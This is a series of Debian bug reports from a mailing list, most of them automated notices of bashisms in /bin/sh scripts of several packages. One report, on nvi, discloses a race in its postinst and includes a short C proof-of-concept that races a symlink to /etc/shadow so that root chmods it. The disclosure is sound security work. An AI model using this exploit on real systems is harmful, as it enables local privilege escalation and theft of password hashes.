Bug#772234: graphviz: bashism in /bin/sh script
Package: graphviz
Severity: important
Version: 2.38.0-6
User: debian-rele...@lists.debian.org
Usertags: goal-dash
Hi,
I've ran checkbashisms (from the 'devscripts' package) over the whole
archive and I found that your package has a /bin/sh script that uses a
"bashism".
checkbashisms' output:
> possible bashism in ./usr/bin/gvmap.sh line 67 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ "$OPTARG" == '?' ]]
> possible bashism in ./usr/bin/gvmap.sh line 67 (should be 'b = a'):
> if [[ "$OPTARG" == '?' ]]
> possible bashism in ./usr/bin/gvmap.sh line 79 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ $# == 0 ]]
> possible bashism in ./usr/bin/gvmap.sh line 79 (should be 'b = a'):
> if [[ $# == 0 ]]
> possible bashism in ./usr/bin/gvmap.sh line 81 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ -n $VERBOSE ]]
> possible bashism in ./usr/bin/gvmap.sh line 87 ('((' should be '$(('):
> while (( $# > 0 ))
> possible bashism in ./usr/bin/gvmap.sh line 89 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ -f $1 ]]
> possible bashism in ./usr/bin/gvmap.sh line 91 (alternative test command
> ([[ foo ]] should be [ foo ])):
> if [[ -n $VERBOSE ]]
Not using bash (or a Debian Policy compliant shell interpreter that doesn't
provide such an extra feature) as /bin/sh is likely to lead to errors or
unexpected behaviours. Please be aware that dash is the default /bin/sh.
Please closely examine the above output and the script, and determine
what the proper severity of the bug is, and adjust it accordingly. If
it's important or greater please hurry to get this fixed for jessie.
Hints about how to fix bashisms can be found at:
https://wiki.ubuntu.com/DashAsBinSh
Thanks in advance,
Raphael Geissert
--
To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/2554460.2By0TpSjE0@eee
Bug#772259: dump: bashism in /bin/sh script
Package: dump Severity: minor Version: 0.4b44-5 User: debian-rele...@lists.debian.org Usertags: goal-dash Hi, I've ran checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism". checkbashisms' output: > possible bashism in ./usr/share/doc/dump/examples/dump_on_cd_3/dump_disk > line 47 (trap with ERR|DEBUG|RETURN): > trap error_exit ERR Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh. Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie. Hints about how to fix bashisms can be found at: https://wiki.ubuntu.com/DashAsBinSh Thanks in advance, Raphael Geissert -- To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/4794428.ztbkcPe1SP@eee
Bug#772363: sendmail-base: bashism in /bin/sh script
Package: sendmail-base Severity: normal Version: 8.14.4-8 User: debian-rele...@lists.debian.org Usertags: goal-dash Hi, I've ran checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism". checkbashisms' output: > possible bashism in ./usr/share/sendmail/dynamic line 342 (sleep only takes > one integer): > sleep 1s; Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh. Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie. Hints about how to fix bashisms can be found at: https://wiki.ubuntu.com/DashAsBinSh Thanks in advance, Raphael Geissert -- To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/2254933.T9YkZYOqlq@eee
Bug#771375: nvi: insecure use of /var/tmp
* Jakub Wilk , 2014-11-28, 23:19:
nvi does this in postinst:
if [[ -L /var/tmp/vi.recover || \
-e /var/tmp/vi.recover && ! -d /var/tmp/vi.recover ]]; then
echo "Cannot create recovery directory /var/tmp/vi.recover" 1>&2
exit 1
fi
[ -d /var/tmp/vi.recover ] || mkdir -p /var/tmp/vi.recover
chown root:root /var/tmp/vi.recover
chmod 1777 /var/tmp/vi.recover
This is racy.
If there is no symlink protection enabled
(/proc/sys/fs/protected_symlinks), malicious local user could trick
this code into chmodding arbitrary files.
PoC exploit is attached. On a test machine I was able to get /etc/shadow
pwned with probability ~0.1%.
--
Jakub Wilk
#include
#include
int main(int argc, char **argv)
{
const char *f = "/var/tmp/vi.recover";
while (1) {
symlink("/etc/shadow", f);
unlink(f);
mkdir(f, 0777);
rmdir(f);
}
}
Bug#772353: pdnsd: bashism in /bin/sh script
Package: pdnsd Severity: important Version: 1.2.9a-par-2 User: debian-rele...@lists.debian.org Usertags: goal-dash Hi, I've ran checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism". checkbashisms' output: > possible bashism in ./etc/init.d/pdnsd line 64 (sleep only takes one > integer): > sleep 0.1 Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh. Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie. Hints about how to fix bashisms can be found at: https://wiki.ubuntu.com/DashAsBinSh Thanks in advance, Raphael Geissert -- To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/1538835.KmDLzbQ4Ak@eee
Bug#772383: ulatencyd: bashism in /bin/sh script
Package: ulatencyd Severity: minor Version: 0.5.0-9 User: debian-rele...@lists.debian.org Usertags: goal-dash Hi, I've ran checkbashisms (from the 'devscripts' package) over the whole archive and I found that your package has a /bin/sh script that uses a "bashism". checkbashisms' output: > possible bashism in ./etc/init.d/ulatencyd line 94 (sleep only takes one > integer): > sleep 0.2 Not using bash (or a Debian Policy compliant shell interpreter that doesn't provide such an extra feature) as /bin/sh is likely to lead to errors or unexpected behaviours. Please be aware that dash is the default /bin/sh. Please closely examine the above output and the script, and determine what the proper severity of the bug is, and adjust it accordingly. If it's important or greater please hurry to get this fixed for jessie. Hints about how to fix bashisms can be found at: https://wiki.ubuntu.com/DashAsBinSh Thanks in advance, Raphael Geissert -- To UNSUBSCRIBE, email to debian-qa-packages-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/4449086.frMLg6A149@eee
